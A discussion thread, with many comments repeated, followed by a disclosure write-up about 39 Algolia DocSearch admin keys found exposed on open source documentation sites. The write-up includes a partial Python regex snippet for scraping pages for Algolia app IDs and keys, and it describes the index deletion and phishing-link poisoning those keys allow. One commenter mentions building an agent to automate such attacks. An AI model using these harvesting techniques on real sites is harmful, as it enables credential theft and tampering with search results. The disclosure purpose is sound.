I found 39 Algolia admin keys exposed across open source documentation sites

the wildest part is algolia just not responding. you email them saying "hey 39 of your customers have admin keys in their frontend" and they ghost you? thats way worse than the keys themselves imo. like the whole point of docsearch is they manage the crawling FOR you, but then the "run your own crawler" docs basically hand you a footgun with zero guardrails. they could just... not issue admin-scoped keys through that flow

Twenty years ago every PHP website had search. We forgot how to do it.

Man, talk about unnecessary graphs... ok graph 2 is maybe tolerable, although it's showing the popularity of the projects, not a metric of how many errors/vulnerabilities found in those projects.

I'm not a newspaper editor, but I think if this was an article for one, they'd also say the graphs are unnecessary. It smells of "I need some visual stuff to make this text interesting"...

Is this aloglia's (or any provider) responsability or each individual integration ?

So why hasn't the HomeAssistant docs page been nuked yet?

I have been developing an OpenClaw-like agent that automates exactly this type of attack.

Interesting how many people already are playing with these API keys ? ;)

Great write up. Reminder that if you commit these to a Github Gist and the provider partners with GitHub for secrets scanning, they’ll rapidly be invalidated.

So why hasn't the HomeAssistant docs page been nuked yet?

Interesting how many people already are playing with these API keys ? ;)

Man, talk about unnecessary graphs... ok graph 2 is maybe tolerable, although it's showing the popularity of the projects, not a metric of how many errors/vulnerabilities found in those projects.

I'm not a newspaper editor, but I think if this was an article for one, they'd also say the graphs are unnecessary. It smells of "I need some visual stuff to make this text interesting"...

It's Friday night / Saturday morning. Who wants to be reading text?

Especially on night mode themes.

Besides, can we read anymore? In the age of 'GPT summarise it me' attention spans and glib commentary not about the content of the article being all many people have to add, perhaps liberal application of visualisations adds digestive value.

Dude there’s only three graphs in there. Do they really bother you that much? The third may be a bit unnecessary but I think the visuals add to the post.

I have been developing an OpenClaw-like agent that automates exactly this type of attack.

Why? This is just regex search and there are plenty of tools that do this perfectly fine.

Great write up. Reminder that if you commit these to a Github Gist and the provider partners with GitHub for secrets scanning, they’ll rapidly be invalidated.

That's just a tautology.

"If the secrets issuer partners with X-corp for secret scanning so that secrets get invalidated when you X them, then when you X them the secrets will be invalidated".

The above is a true statement for all X.

It's Friday night / Saturday morning. Who wants to be reading text?

Especially on night mode themes.

Dude there’s only three graphs in there. Do they really bother you that much? The third may be a bit unnecessary but I think the visuals add to the post.

So you agree partially with what I said.

The poster is 16, he can take it as feedback towards effective writing. Or the intellectual HN crowd can just downvote it and dissuade me from contributing and helping a kid (oh look at me, how fucking noble am I, right?).

Ah, that feeling of "Am I the only one who gets it around here?". I wanted to explain to you why graph 2 is dumb, and graph 1 is very little information, but heck, I felt dissuaded.

Why? This is just regex search and there are plenty of tools that do this perfectly fine.

Have to agree with _pdp_ on this one. I just don't see the need for an LLM agent to do a recursive grep for API keys in public repos.

Not saying people shouldn't build these tools, but the use case is lost on me.

It feels like the industry is in this weird phase of trying to replace 30-year-old, perfectly optimized shell utilities with multi-shot agent workflows that literally cost money to run. A basic Python script with a regex matcher and the GitHub API will find these keys faster, cheaper, and more reliably.

None of those proven tools would make a man feel like a wannabe Mr. Robot.

That's just a tautology.

"If the secrets issuer partners with X-corp for secret scanning so that secrets get invalidated when you X them, then when you X them the secrets will be invalidated".

The above is a true statement for all X.

? Yes? Toomuchtodo is reminding the author (and other commenters), that github gists are one way to make sure secrets are secured / remediated before making a public post like this. Maybe not the most responsible whitehat action, but I can see it being useful in some cases where outreach is impractical / has failed.

Unfortunately, it doesn't look like Algolia has implemented this

None of those proven tools would make a man feel like a wannabe Mr. Robot.

Unfortunately, it doesn't look like Algolia has implemented this

English is not formal logic.

In formal logic, that statement is true whether X is GitHub, or Lockheed-Martin, Safeway, or the local hardware store.

In English, the statement serves to inform (or remind) you that GitHub has a secret scanning program that many providers actually do partner with.

So you agree partially with what I said.

Ah, that feeling of "Am I the only one who gets it around here?". I wanted to explain to you why graph 2 is dumb, and graph 1 is very little information, but heck, I felt dissuaded.

If you’re “helping a kid” then I guess I can help you. Help is criticism delivered with a constructive tone. Criticism can be helpful if you look past the tone.

If you want to help, you should sound helpful.

I liked the graphs. When skimming posts i often stop on graphical elements and decide if I want to understand the context or continue skimming. In this context, all three graphs were useful for me.

Posts with just text are sense and just not nice to read. That's why even text-only blog posts have a tendency to include loosely-related image at the top, to catch reader's eye.

I'm not following this at all. It seems like OP is saying if you share a secret in your (private?) gist and give Algolia permission to read the gist, they will invalidate it. But why would the secret be in a gist and not a repo? Also if you're aware enough to add that partner it seems you're aware to not do dumb things like that in the first place.

English is not formal logic.

In formal logic, that statement is true whether X is GitHub, or Lockheed-Martin, Safeway, or the local hardware store.

In English, the statement serves to inform (or remind) you that GitHub has a secret scanning program that many providers actually do partner with.

Yes, and in the real world where Grice's Maxim of Relevance is in force, then when the secrets issuer that is the subject of the discussion isn't one of those partners, then an informative "reminder" that GitHub "has a secret scanning program" with a bunch of other partners is not actually informative. It's as superfluous and unhelpful as calling to let someone know you're not interested in the item they've posted for sale on Craiglist (<https://www.youtube.com/watch?v=xWG3jKzKcm8>).

If you’re “helping a kid” then I guess I can help you. Help is criticism delivered with a constructive tone. Criticism can be helpful if you look past the tone.

If you want to help, you should sound helpful.

Fully agreed; this is something that always baffles me when it's misunderstood so often. Regardless of whether it's logical or not, tone and attitude in practice does influence whether people are convinced by something, so if your goal is to actually change how someone else acts, you will not be as effective if you don't care about how you come across. Being right is not always enough, so even if the style of communicating doesn't seem like it "should" matter, in practice it genuinely does if success is measured by whether the change happens or not.

Of course, if the goal is just to be right rather than to convince someone else about what's right, how you're saying something doesn't matter, but at that point you've already reached the goal before you started talking to them, so it's worth reexamining what you're actually looking to get out of a conversation at that point.

I liked the graphs. When skimming posts i often stop on graphical elements and decide if I want to understand the context or continue skimming. In this context, all three graphs were useful for me.

Posts with just text are sense and just not nice to read. That's why even text-only blog posts have a tendency to include loosely-related image at the top, to catch reader's eye.

If you find an exposed token in the wild, for a service supported by GitHub Secret Scanning, uploading it to a Gist will either immediately revoke it or notify the owner.

It's more useful than telling someone that their statement is a tautology in formal logic.

How is reminding people that they can safely revoke exposed API keys not informative? Why are you being so combative?

It's more useful than telling someone that their statement is a tautology in formal logic.

How is reminding people that they can safely revoke exposed API keys not informative? Why are you being so combative?

If you find an exposed token in the wild, for a service supported by GitHub Secret Scanning, uploading it to a Gist will either immediately revoke it or notify the owner.

Ok I see, so any public gist with an algolia key in it will get invalidated? And it would have to follow some pattern like ALGOLIA_KEY=xxx ?

Is this aloglia's (or any provider) responsability or each individual integration ?

Why contact Algolia when it is the users' responsibility to handle their keys? Contact all the users.

Twenty years ago every PHP website had search. We forgot how to do it.

Have to agree with _pdp_ on this one. I just don't see the need for an LLM agent to do a recursive grep for API keys in public repos.

Not saying people shouldn't build these tools, but the use case is lost on me.

still 404 but the standard is .well-known/security.txt

I remember that time, it was usually better to go to google and use "site:".

Having a search and having a functional search are two very different things though. To this day, the search on many sites is so bad that it's actually better to use a search engine and scope by site rather than use the site search.

To be fair, the search was thanks to databases and it was usually not very good (it takes work to set correctly).

Why contact Algolia when it is the users' responsibility to handle their keys? Contact all the users.

The comment you're responding to is output of an LLM.

If this happens so often, perhaps Algolia should improve their stuff to prevent this? For example, by implementing a dedicated search endpoint that doesn't accept normal API keys, but only dedicated read-only keys.

It is the users responsibility to operate foot guns responsibly.

because if it's easy to dangerously use one's product that reflect poorly on the product. Algolia should help its clients from making silly mistakes.

still 404 but the standard is .well-known/security.txt

To be fair, the search was thanks to databases and it was usually not very good (it takes work to set correctly).

I remember that time, it was usually better to go to google and use "site:".

I still do that for almost everything.

The comment you're responding to is output of an LLM.

Note all the very similar grey comments at the bottom of the page.

because if it's easy to dangerously use one's product that reflect poorly on the product. Algolia should help its clients from making silly mistakes.

It is the users responsibility to operate foot guns responsibly.

I still do that for almost everything.

Note all the very similar grey comments at the bottom of the page.

Last October I reported an exposed Algolia admin API key on vuejs.org. The key had full permissions: addObject, deleteObject, deleteIndex, editSettings, the works. Vue acknowledged it, added me to their Security Hall of Fame, and rotated the key.

That should have been the end of it. But it got me thinking: if Vue.js had this problem, how many other DocSearch sites do too?

Turns out, a lot.

How Algolia DocSearch works

Algolia's DocSearch is a free search service for open source docs. They crawl your site, index it, and give you an API key to embed in your frontend. That key is supposed to be search-only, but some ship with full admin permissions.

What I found

Most keys came from frontend scraping. Algolia maintains a public (now archived) repo called docsearch-configs with a config for every site in the DocSearch program, over 3,500 of them. I used that as a starting target list and scraped roughly 15,000 documentation sites for embedded credentials. This catches keys that don't exist in any repo because they're injected at build time and only appear in the deployed site:

APP_RE = re.compile(r'["\']([A-Z0-9]{10})["\']')
KEY_RE = re.compile(r'["\']([\da-f]{32})["\']')

def extract(text, app_ids, api_keys):
    if not ALGOLIA_RE.search(text):
        return
    for a in APP_RE.findall(text):
        if valid_app(a):
            app_ids.add(a)
    api_keys.update(KEY_RE.findall(text))

On top of that I ran GitHub code search to find keys in doc framework configs, then cloned and ran TruffleHog on 500+ documentation site repos to catch keys that had been committed and later removed.

Discovery Method Breakdown

35 of the 39 admin keys came from frontend scraping alone. The remaining 4 were found through git history. Every single one was active at the time of discovery.

The affected projects include some massive open source projects:

Top Affected Projects by GitHub Stars

Home Assistant alone has 85,000 GitHub stars and millions of active installations. KEDA is a CNCF project used in production Kubernetes clusters. vcluster, also Kubernetes infrastructure, had the largest search index of any affected site at over 100,000 records.

What these keys can do

Admin Key Permissions

Nearly all 39 keys share the same permission set: search, addObject, deleteObject, deleteIndex, editSettings, listIndexes, and browse. A few have even broader access including analytics, logs, and NLU capabilities.

In practical terms, anyone with one of these keys can:

Add, modify, or delete any record in the search index
Delete the entire index
Change index settings and ranking configuration
Browse and export all indexed content

Someone could poison a project's search results with malicious links, redirect users to phishing pages, or just nuke the entire index and wipe out search for the site completely.

Disclosure

SUSE/Rancher acknowledged the report within two days and rotated the key. That key is now fully revoked. Home Assistant also responded and began remediation, though the original key remains active.

I compiled the full list of affected keys and emailed Algolia directly a few weeks ago. No response. As of today, all remaining keys are still active.

The root cause

This isn't really about 39 individual misconfigurations. Algolia's DocSearch program provides search-only keys, but many sites run their own crawler and end up using their write or admin key in the frontend config instead. Algolia's own docs warn against this, but it clearly happens at scale.

The fix is straightforward: if you're running DocSearch, check what key is in your frontend config and make sure it's search-only. If I found 39 admin keys with a few scripts, the real number is almost certainly higher.

Hacker Times